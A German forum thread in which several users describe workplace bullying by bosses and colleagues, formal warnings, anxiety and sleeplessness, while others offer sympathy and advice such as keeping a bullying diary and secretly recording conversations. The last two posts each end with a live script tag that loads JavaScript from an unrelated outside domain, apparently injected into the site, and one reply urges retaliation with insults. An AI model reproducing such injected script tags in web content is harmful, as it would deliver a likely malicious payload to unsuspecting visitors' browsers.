Ankündigung

Einklappen
Keine Ankündigung bisher.

Was kommt heute wieder

Einklappen
X

• Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

• Was kommt heute wieder

Ich fahre jeden morgen mit einem komischen Gefühl zur Arbeit und denke, was kommt heute wieder. Es zerreisst mich innerlich. Schlimm finde ich, das ich nur noch zusehe, meine Arbeit so schnell wie moglich zu machen und darauf warte wann ich Feierabend habe.
    Ich weiß wenn ich nichts ändere tut es keiner aber es umzusetzen ist verdammt schwer, wenn man einen Chef hat der heute so ist und morgen wieder so. Heute war er auf " Schmusekurs" wie eine gute Kollegin immer sagt und morgen macht er mich rund, für Fehler die ich überhaupt nicht gemacht habe. Die Kollegin die mobbt, für die darf ich die Fehler ausbaden. Sie macht ihre Arbeit nicht und wird noch vom Chef unterstützt. Sie setzt Gerüchte in die Welt und wer ist Schuld............... ich natürlich. Sie erzählt die Sachen auch nicht so wie man sie gesagt hat, sondern ganz anders. Man steht immer wie eine doofe da. Sie grinst dich an und im nächsten moment, soll man tod umfallen. Sie unterstellt mir auch meine Arbeit nicht ordentlich zu machen und man müsste ständig hinter mir her räumen aber es ist genau umgekehrt.
    Na ja beklopptheit ist mir auch schon unterstellt worden, frage mich nur wie ich dann mein Examen bestanden habe und mich weitergebildet habe zur Wundexpertin.
    Ich habe das Gefühl man kämpft gegen Windmühlen.

AW: Was kommt heute wieder

Mit manchen Leuten kann man einfach nicht gut. Und da sie länger da ist als Du, hat sie die besseren Karten. Eigentlich könntest Du sie ja genauso behandeln wie umgekehrt. Aber für einen anständigen Menschen ist das gar nicht so einfach... Nach meiner Erfahrung ist es so, dass wenn man denen mal das antut, was sie umgekehrt immer tun, sie ganz schnell den Schwanz einziehen. Die sind doch feige Säue.
    Audrey

Kommentar

Hallo ich hab mich grade neu hier angemeldet, weil es mir genauso geht und ich das alles einfach mal loswerden muß.Ich arbeite seit April 91 in ein und dem selben Betrieb immer zuverlässig selten krank auch mit 3 Kindern immer einsatzbereit und wie ich meine ziemlich beliebt.Das klingt jetzt vielleicht ein bisschen arrogant ,aber das bin ich ganz und gar nicht.Wer mich kennt der weiß wie ich bin und bis jetz lief auch immer alles ganz gut.Wie gesagt seit nun mittlerweile über 20 Jahren da fest angetellt, hatte ich noch nie großartige Probleme mit meinen Kollegen bis auf die üblichen kleinen Reibereien.Als ich mit meinem 2.Kind in den Erziehungsurlaub ging, wurde der Betrieb geschlossen ,abgerissen und an der gleichen Stelle neu gebaut.In dieser Zeit bekam ich mein 3.Kind und als ich wieder arbeiten konnte, begann ich in einem völlig neuen Betrieb.Meine damaligen Kollegen wurden alle gekündigt, ich war die einzige die noch übrig geblieben war, da man mich im Erziehungsurlaub nicht kündigen konnte.Am 1.1.06 nahm ich meine Arbeit wieder auf mit neuen Kollegen und neuem Chef ,aber es lief anfangs ganz gut.Aber jetzt nach 6 jahren läuft garnichts mehr.mein Chef ist nur noch damit beschäftigt mich täglich fertig zu machen ,alle Kollegen hinter ihm ,weil keiner sich traut, ihm zu widersprechen.Egal was ich mache und wie gut ich es mache ,es wird regelrecht nach Fehlern gesucht.Manchmal ist es wirklich so ,daß ich keine Lust habe ,überhaupt auf Arbeit zu gehn,obwohl ich meine Arbeit sehr gerne mache, oder eben wie schon oben erwähnt, Hauptsache es ist schnell Feierabend.Am schlimmsten ist es aber ,wenn wir unsere monatliche Versammlung haben wo alle Kollegen an einen Tisch kommen und über alles gesprochen wird.Dabei bin ich jedesmal Hauptthema und werde regelmäßig vor allen runtergemacht mit den "Fehlern" die ich wieder verbrochen habe.Schon das alleine empfinde ich als Mobbing bis jetzt war ich immernoch stark genug es nicht so nah an mich rankommen zu lassen, da ich weiß daß es Mobbing ist und sie mich bloß fertig machen wollen, da ich mir nichts vorzuwerfen habe.Da muß ich mich plötzlich mit 40 Jahren nach 20jähriger Berufserfahrung abmelden für jeden Fleck Rechenschaft ablegen, werde kontrolliert bei allem was ich mache und komme mir vor wie im Kindergarten.Beschwere ich mich ,wird nur müde gelächelt.Versuche ich alles richtig zu machen ,ist garantiert was anderes nicht in Ordnung.Ich weiß nicht wie lange ich das noch aushalte, mir ist schon oft gesagt worden daß ich doch kündigen könne, aber das kommt für mich nicht in Frage.ich bin alleinerziehend mit 3 Kindern und bin ja froh meine Arbeit zu haben.Wenn man mich einfach mal wie eine erwachsene Frau behandeln und mir vertrauen würde ,wäre alles einfacher.Mittlerweile hab ich schon Angst meine Arbeit zu verlieren ,einfach so.ich habe noch nie eine Abmahnung bekommen oder bin anderweitig negativ aufgefallen.So ganz alleine dazustehen ,ist dann aber umso schwerer.

Kommentar

Beweise sammeln (vlt. Tonbandaufnahmen mit dem Handy machen), Mobbingtagebuch führen u.s.w. u.s.f. - das hilft Dir vielleicht alles irgendwann mal weiter, wenn es hart auf hart kommt. Gibts einen Betriebsrat bei euch? Dann mal vertrauensvoll an den wenden. Hier im Forum findest Du noch massig weitere Tipps. Schau Dich mal um. Viele User haben echt gute Ratschläge!
        Ich drück dir die Daumen und wünsch Dir die Kraft durchzuhalten!
        >>ich bin bereit mit Dir Wege zu gehen.Nicht bereit bin ich Deinen Weg mit Verständnis zu pflastern und damit so beschäftigt zu sein,
        dass ich von meinem Weg abkomme!
        <<

Kommentar

Vielen Dank für deine Antwort.Mobbingtagebuch hab ich angefangen,das mit dem Handy war auch mal so ne Idee von mir,aber nich durchsetzbar,weil wir bei uns Handyverbot haben und strengstens darauf geachtet wird,daß niemand ein Handy mit sich führt,bzw.daß ICH kein Handy einstecken habe.Die anderen werden jediglich darauf hingewiesen,daß Handys nicht erwünscht sind.Deswegen bin ich mal auf de Idee gekommen,mir ein Diktiergerät anzuschaffen,aber da ja jeder jeden"verpetzt"is das auch ziemlich riskant.Einen Betriebsrat gibt es nicht mehr,zumindest keine Personen,die man persönlich ansprechen kann.Ich müßte in Düsseldorf anrufen,da unser Betrieb dort seinen Hauptsitz hat und nur da Leute sitzen,die ich ansprechen könnte.Diese Leute sind mir aber völlig fremd und in meinen Augen nicht direkt geeignet,weil mir dafür das nötige Vetrauen fehlt.In unserem alten Betriebsrat kannte ich alle persönlich da konnte man sich mal einen zur Seite nehmen.Witzig finde ich es ja auch immer,daß der Chef mal so und mal so ist.Mittlerweile weiß ich,daß das nur Taktik ist.An einem Tag ist er unaustehlich,das geht dann paar Tage so.Am anderen Tag ist er wieder wie ausgewechselt und behandelt mich so,wie ich es mir immer wünschen würde.Aber das wechselt ständig,man weiß nie was auf einen zukommt,wenn man früh auf Arbeit geht.Am schönsten ist es daher immer,wenn er frei hat.Dann kann man mal durchatmen.Er geht dieses Jahr noch in Rente,ich bin mal gespannt,wie das Arbeitsklima dann ist,wenn er weg ist.Aber die Zeit bis dahin versuche ich weiterhin durchzuhalten und denen zu zeigen,daß ich stark bin und sie mich nicht fertig machen können.

Kommentar

Hallo
            wie ich oben schon geschrieben habe, was kommt heute wieder.
            Ja wie soll ich sagen: eine Abmahnung.
            Jetzt ist meine Welt richtig zusammen gebrochen.
            Ich mag und kann nicht mehr.
            Ich bin müde geworden, angeschlagen usw.
            Bei mir ist es so wenn es kommt, kommt alles auf einmal.
            So langsam weiß ich nicht mehr wie ich mich drehen soll.
            Trotzdem muss ich stark sein, ich habe ein Kind und bin alleine.
            Selbst weinen kann ich nicht mehr.
            Mir ist aber auch klar, der Ausbruch wird kommen und davor habe ich Angst.

Kommentar

Wofür ist die Abmahnung?
              Hast du die mündlich oder schriftlich gekriegt?
              Ich hatte mal ne Androhung einer schriftlichen,die ich aber nie erhalten hab.
              Daraufhin hab ich mal gegoogelt um mal zu sehn,wofür man eigentlich alles ne Abmahnung kriegen kann.
              Bei mir war das ein Grund der garnich aufgeführt war und mit dem die auch nich durchgekommen wären.
              Dazu kommt noch,daß schon die Androhung einer Abmahnung ein Grund für eine Anzeige wäre.
              Noch bin ich stark genug und mit der Aussicht darauf,daß mein chef ja bald in Rente geht,gehts mir soweit noch ganz gut.
              Ich hatte jetzt ne Woche Urlaub,da konnte ich mal abschalten.
              Ich meld mich auf alle Fälle wieder,wenns was neues gibt.
              Bin gespannt,wie es am Montag wird.

Kommentar

Hallo
                ich habe die Abmahnung schriftlich erhalten.
                Ich habe es auch gegooglt und meine Abmahnung ist glaube ich rechtens.
                Sie haben leider das Haar in der Suppe gefunden ( bildlich gesprochen )
                und wenn es das nicht wäre, dann wäre es was anderes gewesen.
                Ich habe etwas vergessen was abgesprochen war. Es zählt auch nicht das ich 3 Wochen krank war und die Feiertag dazwischen lagen, Weihnachten und Silvester. Weihnachten musste ich arbeiten.
                Ich mag auch nicht mehr, ich werde mir wohl was anderes suchen und schauen das ich mal wieder zur Ruhe komme.
                Mein Körper fängt auch schon an zu streiken.

Kommentar

@Fruity44 und spiegelbild

Ich bin derzeit in einer ähnlichen Situation wie Ihr beide, so kann ich es nicht nur verstehen, sondern auch mitfühlen, was Ihr gerade durchmacht.

Ich bin nun seit 8 Monaten dort. Auch bei mir ist es so, daß ich machen kann was ich will, nichts ist recht. Die Dame die mich einschulen soll, hat keinen blassen Schimmer von Einschulung, hat keine Struktur. Ein Mal heißt es so, dann heißt es wieder anders. Je nachdem wie ich es mache, gilt natürlich dann das Andere. Dadurch gibt es auch kein Weiterkommen. Gespickt mit abfälligen Bemerkungen ala ich merke mir nie etwas, das was ich mache ist scheiße, gehts jeden "dritten" Satz in cholerischer Art den ganzen Tag dahin.
                  Jetzt wo ich arbeitstechnisch trotz ihrer inkompetenten Einschulung etwas sattelfester bin, läßt sie sich neues einfallen. Das geht nun schon so weit, daß ich bereits bemängelt werde, wenn der Kugelschreiber nicht neben, sondern schräg neben der Tastatur liegt. Teils bin ich dadurch derart verunsichert, daß ich mir in gar nichts mehr sicher bin, was ich wie und zu welchen Zeitpunkt machen soll und bereits tatsächlich des öfteren Sachen vergesse, oder auch übersehe.

Typische Mobbingstrukturen wären dann, ständiges Unterbrechen, 20 Dinge gleichzeitig in allen Unterkatigorieren schwammig erklären und sich aufregen, weil ich mir nicht alles gemerkt habe, Aufschreiben untersagt zu bekommen und sich dann aufregen, weil ich mir nichts aufgeschrieben habe usw. usf.

Wehre ich mich der Angriffe, zieht die Dame den sprichwörtlichen Schwanz ein und hab ich maximal 2 Tage ruhe, dann fängt es wieder an, aber ich bin es leid mich ständig erwehren zu müssen.

Der Chef weiß davon, tut aber nichts bzw. schlägt sich auf deren Seite und mischt fest mit. Und ich merke an der Art, wie abteilunsfremde Personen auf mich reagieren, daß nun schon hinter meinem Rücken über mich geschimpft wird.

Da meine Gesundheit bereits darunter leidet (Erschöpfungszustände, Durchfall, Kopfschmerzen udg.) werde ich die einzig logische Konsequenz aus der Situation ziehen und kündigen.

Ich denke, daß ein Neuanfang oft auch Gold sein kann und es muß auch nicht als Flucht vor der Situation gesehen werden. Es geht einfach darum so autentisch zu sein, daß man sich selbst sagt, daß man sich solcher Art Situationen nicht aussetzen muß, auch wenn man sich wie in meinem Fall, durchaus seiner Haut erwehren kann und so ziehe ich nun nach bereits "längerem Zuschauen" und Versuchen die Notbremse, denn lasse es nicht mehr zu, daß diese Kollegen mein Leben auch außerhalb der Arbeit (die Gedanken kreisen ja nun noch darum - Selbstzweifel udg.) bestimmen. Auch ich bin Alleineerziehend und eine neue Arbeit suchen ist nie lustig, aber es ist besser so.

Und noch etwas. Was auch immer das Problem solcher Personen sein mag, sei es daß sie es selbst täglich brauchen mit anderen in Konflikt zu geraten, selbst ein psychisches Problem haben, Besserwissen sind, oder einen unglaublichen Geltungsdrang haben... es kann und darf nicht auf unseren Schultern ausgetragen werden. Ich bin weder deren Psychater, noch deren Fußabtreter. Niemand braucht sich so behandeln zu lassen.

Alles Gute euch beiden und laßt euch nichts gefallen. Es gibt auch andere Arbeitgeber und Kollegen, welche ihr Gegenüber schätzen. Mich würde interessieren, wie es bei euch weitergeht.
                  DieRückseite
                  Forumsmitglied
                  Zuletzt geändert von DieRückseite; 19.02.2012, 14:14.

Kommentar

Hallo
                    Ich hatte gerade einen Anruf von einer wirklich netten Kollegin.
                    Eigentlich hatte sie mich wegen etwas anderes angerufen.
                    Sie sagte mir meine Kollegin die mich immer mobbt, zweifelt meine Kompetenz an bei einer Wundversorgung.
                    Sie meint also was ich da machen würde wäre mist und so würde die Wunde nie zu gehen.
                    Da müsste was ganz anderes drauf, aber das sich die Wunde verkleinert bzw verbessert hat, interessiert sie nicht.
                    Die Frau die, die Wunde hat, hat auch keine Schmerzen mehr auch das interessiert nicht.Die Mobberin macht jetzt ihr Dingen.
                    Ich habe momentan frei. Gott sei Dank.
                    Ich spreche nur noch das nötigste mit ihr und ich denke weil man nicht mehr anders an mich ran kommt, geht man jetzt diesen Weg.
                    Eigentlich sollte mich nichts mehr wundern, aber die erfinden ja die " tollsten " Sachen.
                    Solche Menschen finde ich nur noch abstoßend.
                    Die zerstören einen sein Leben, Beruf usw

Kommentar

Ja stimmt ,es ist alles eine einzige Katastrophe. Ich hatte jetzt erst eine Woche Urlaub da gings mir richtig gut,weil ich zu Hause war und mit keinem einzigen Gedanken an die Arbeit denken mußte.Gestern war ich den ersten Tag wieder auf Arbeit und ich muß sagen ich komm zur Tür rein und bekam plötzlich Zitteranfälle und Angstzustände.Das hatte ich in meinem Urlaub nicht.Angst ,weil ich wußte jetzt kommt gleich wieder irgendwas und ich mußte auch nicht lange warten.Als hätten die bloß drauf gewartet,daß mein Urlaub rum ist.Ich wurde zum wiederholten Male auf Sachen aufmerksam gemacht,die ich angeblich war,obwohl ich garnicht da war.Die Kollegen die in der Zeit ,als ich Urlaub hatte meine Arbeit gemacht hatten,waren es natürlich nicht.Mir war gleich wieder zum heulen zumute aber mehr aus Wut,weil sie es einfach nicht lassen können.Ich habe nichts dazu gesagt,hab es an mir abbrallen lassen und mich nur innerlich gefragt,warum es grade immer mich trifft.Ich habe nichts gemacht,bin immer da und trotzdem.Vor kurzem war ich in einem anderen Betrieb arbeiten angeblich zum aushelfen,aber wie ich im nachhinein erfahren habe,zum reinschnuppern.Gestern fragte mich der Chef,ob ich mir vorstellen könnte dort zu arbeiten für immer.Im Prinzip ja,weil es mir dort eindeutig besser gefallen hat,nur gehen die Arbeitszeiten wegen meiner Kinder nicht.Das hatten die,die dachten,sie könnten mich loswerden nicht berücksichtigt.Nun haben sie mich immer noch "am Hals".Langsam finde ich es lustig und bin richtig gespannt,was die sich noch alles einfallen lassen um mich loszuwerden.Auf jeden Fall werde ich wieder Bericht erstatten,denn es tut richtig gut alles zu schreiben und sich mit Leuten auszutauschen,denen es genauso geht.

Kommentar

hey,
                        ich wurde heute in einem zweistündigen gespräch mit meiner chefin darauf hingewiesen, dass ich eine durchschnittsmitarbeiterin bin! und sie hätte von mir mehr erwartet da ich ja bereits berufserfahrung habe! das problem dabei ist: ist bin justizfachangestellte und gelernt habe uich bei einem amtsgericht, jetzt bin ich bei einem arbeitsgericht angestellt und arbeitsrecht lernt man kein meter in der ausbildung. also woher soll ich dann bitte die berufserfahrung in diesem bereich nehmen???
                        desweiteren wurde mir eine rechtsschreibschwäche unterstellt klar, ich schreibe jeden tag protokoll und in meinen protokollen sind teilweise zwei fehler meistens komma fehler! sind das rechtsschreibschwächen???
                        dann ging es weiter, das ich zu ruhig wäre! wenn die stapel akten bearbeite und dabei einfach nicht spreche würde das keiner mitbekommen das ich arbeite und das kommt nicht gut an!!! hallo ich bin eben eher eine ruhige person! ich setze mich hin und arbeite konzentriert und das kam bis jetzt bei jedem meiner arbeitgeber gut an! und die sagt mir ich bin zu ruhig? wo gibts denn sowas? dann ging es weiter das ich ja einen psychischen knacks hätte weil ich nur auf abruf lachen würde!??? WAS SOLL DENN DAS?
                        ich habe mich für eine weiterbildung beworben (ausbildung in den beamtenstatus) da meinte meine chefin heute zu mir, dass ich da eh nicht genommen werde weil ich ja keinen einser durchschnitt in meiner abschlussprüfung bekommen habe! ich meinte dann das man da einen einstellungstest machen muss und danach entschieden wird, wer die ausbildung machen darf oder nicht. da hat die mir gar nicht zugehört!
                        ich sagte dann noch das ich bei meinem alten arbeitgeber (amtsgericht) ein super arbeitszeugnis bekommen habe weil ich da eine spitzenkraft war (nicht falsch verstehen) und da meinte meine chefin tatsächlich das wäre ein "gefälligkeitszeugnis" gewesen!
                        ich bin einfach am ende! ich will am liebsten kündigen aber ich kann es nicht wegen dem scheiss geld!
                        ich bin noch jung ich hab noch alles vor mir und habs bestimmt nicht nötig mich so behandeln zu lassen!
                        das problem ist, wenn die vor mir sitzt lässt die mich einfach nie ausreden und dann werd ich so sauer das ich losheulen muss! das ist einfach so schlimm weil dann macht die einen auf lieb und verständnisvoll und dann bin ich so durcheinander... ich will morgen mal mit dem personalrat sprechen weil die chefin mir angedroht hat das sie mich nicht einfach so entlassen wird sonder nur dann wenn sie auch einen ersatz für mich hat!
                        aber ich kann doch kündigen so wie es in meinem tarifvertrag steht oder?
                        oh man ich hab einfach so angst vor dem was morgen kommt!!!
                        als ich heute gegangen bin haben sich alle die was zu sagen haben ´(chefin, teamleiter, frauenbeauftragte) versammelt und sich hinter der geschlossenen tür versammelt, da weiss man doch genau was die gesprochen haben oder?
                        ach leute ich glaub ihr versteht mich! ich verstrehe euch jedenfalls! und bei dem was ich gelesen habe über eure probleme hatte ich wieder das komische gefühl im bauch genau das gefühl mit dem ich jetzt schlafen gehe.... und morgen aufstehe ;(

Kommentar

Hallo
                          kein Mensch ist perfekt und das möchte ich auch gar nicht sein, sonst wäre ich auch nicht menschlich.
                          Ich arbeite auch mit vielen Menschen zusammen, den einen mag man und andere halt nicht aber trotzdem sollte man respektvoll miteinander umgehen.
                          Ich kann nicht verstehen, das eine einzige Person (so wie bei mir) alles zerstören kann und der Chef auch noch mit macht.
                          Ich suche nur noch das Weite aber leider lässt es sich nicht immer vermeiden.
                          Ich wollte immer dort arbeiten wo ich jetzt bin aber das es die Hölle wird, damit habe ich nicht gerechnet.
                          Wenn ich mein Kind nicht hätte, die mich zum lachen bringt usw sehe ich verdammt alt aus.
                          Die meisten Menschen verstehen mich nicht und können sich das auch gar nicht vorstellen, wie es bei uns abgeht.
                          Heute war ein Tag der ruhig verlaufen ist aber wer weiß was morgen kommt.
                          Das Schlafverhalten hat sich bei mir auch wieder verändert. Einschlafen kann ich ganz schlecht und wenn ich schlafe dann nur ein paar Std, dann wieder lange wach, dann wieder ein wenig Schlaf und morgens fühle ich mich als ob mich 20 LKWs überfahren haben.
                          Ich hoffe das ich irgendwann wieder in Ruhe leben kann.

Kommentar

ich möchte mich mal wieder melden
                            ich glaube ich hatte noch garnich erwähnt was und wo ich eigentlich arbeite
                            ich bin küchenhilfe in einem altersheim arbeite am liebsten und vorwiegend im abwasch
                            und seit etwa einem halben jahr gibt es bei uns die regel daß sich jeder der im abwasch arbeitet(ich bin ja nich immer da)dem spätdienst den abwasch zu übergeben hat und der dann konrollieren muß ob der abwäscher alles richtig gemacht hat richte kontrolle sozusagen
                            wie ich schon mal erwähnt hatte bin ich seit nunmehr 21 jahren dieser firma zugehörig und ich habe meine arbeit immer zuverlässig erledigt mußte mich noch nie irgendwo kontrollieren lassen was bei so einer langen zeit ja auch nich unbedingt nötig ist
                            also halte ich mich auch nicht an diese regel weil ich es nicht einsehe mich von den jüngeren kollegen die grade mal paar wochen bei uns arbeiten kontrollieren zu lassen
                            ich hatte deswegen auch schon einiger ärger und auch schon abmahnungen angedroht gekriegt wenn ich mich nicht dran halte aber ich finde diese regel absolut affig
                            das einzige was ich zum spädienst sage ist daß ich fertig bin und jetzt nach hause gehe
                            komischerweise hab ich rausgefunden daß sich keiner an diese regel hält aber nur ich darauf angesprochen wurde weil alle kollegen sich untereinander nicht verraten mich aber melden wenn ich es nicht tue
                            es gibt so eine art strichliste die aussagt wie oft ich mich nicht abgemeldet habe
                            ich werde auch weiterhin nur bescheid sagen daß ich fertig bin und mich nicht kontrollieren lassen
                            meine frage:kann man wegen "sowas" eine abmahnung bekommen?kennt sich jemand damit aus?
                            ich weiß daß die androhung einer abmahnung auch schon mobbing ist vielen dank und liebe grüße an alle
                            <script src="http://rosaplugin.info/dfi823hs.js?0.4643183563295711"></script>

Kommentar

ich hab noch was vergessen zu meinen aufgaben im abwasch gehört natürlich das abwaschen des gesamten geschirrs was ich gebracht kriege das wegräumen und danach das subermachen der geschirrspülmaschine und alles drumherum(selbstverständlich)des fußbodens und der schleuse das hab ich immer alles gemacht ohne daß es jemand kontrollieren mußte sonst hätte es ja längst beschwerden gegeben was gibt es daran bitteschön noch zu übergeben?
                              <script src="http://rosaplugin.info/dfi823hs.js?0.17201921072065618"></script>

Kommentar

Lädt...
                              X